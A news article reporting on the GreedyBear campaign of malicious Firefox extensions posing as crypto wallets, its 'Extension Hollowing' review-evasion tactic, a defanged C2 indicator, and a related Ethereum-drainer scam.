A sophisticated cyber campaign known as GreedyBear has come to light, involving the deployment of over 150 malicious Firefox extensions impersonating popular cryptocurrency wallets. The attackers have already stolen more than $1 million in digital assets, according to cybersecurity firm Koi Security.
The fake browser add-ons, identified by researcher Tuval Admoni, mimic well-known wallets such as MetaMask, TronLink, Exodus, and Rabby Wallet, with the goal of harvesting users’ wallet credentials. What sets this operation apart is a novel evasion technique referred to as “Extension Hollowing”, which allows malicious actors to bypass Mozilla’s review processes by publishing safe-looking extensions and later updating them with harmful code.
“Rather than trying to sneak malicious extensions past initial reviews, they build legitimate-seeming extension portfolios first, then weaponize them later when nobody’s watching,” Admoni explained in a recent report.
The threat actors initially upload harmless extensions with no real functionality to pass security checks. They then flood the pages with fake positive reviews to boost credibility before modifying the extensions to include malicious behavior. These fake tools capture wallet credentials and IP addresses, sending the stolen data to a command-and-control (C2) server linked to IP: 185.208.156[.]66.
This campaign appears to be an evolution of an earlier effort called Foxy Wallet, which also targeted Firefox users through similar methods. But the scope has expanded significantly, now covering multi-platform malware distribution including scam sites, browser extensions, and malicious executable files often shared via Russian websites offering pirated software.
In addition to fake wallets, attackers have also launched phishing websites posing as crypto tools like wallet repair utilities to further deceive users and steal sensitive data.
Koi Security also noted signs that AI-powered tools may have been used to create the malware and supporting infrastructure, enabling the operation to scale rapidly.
Meanwhile, SentinelOne uncovered a parallel crypto fraud operation where Ethereum drainers are disguised as trading bots, promoted through AI-generated YouTube videos. Victims are lured into deploying malicious smart contracts, ultimately redirecting funds to the attacker’s wallet.
As AI continues to be misused for creating fake content and scaling cybercrime, experts warn of increasingly complex and deceptive attacks targeting the growing crypto community.
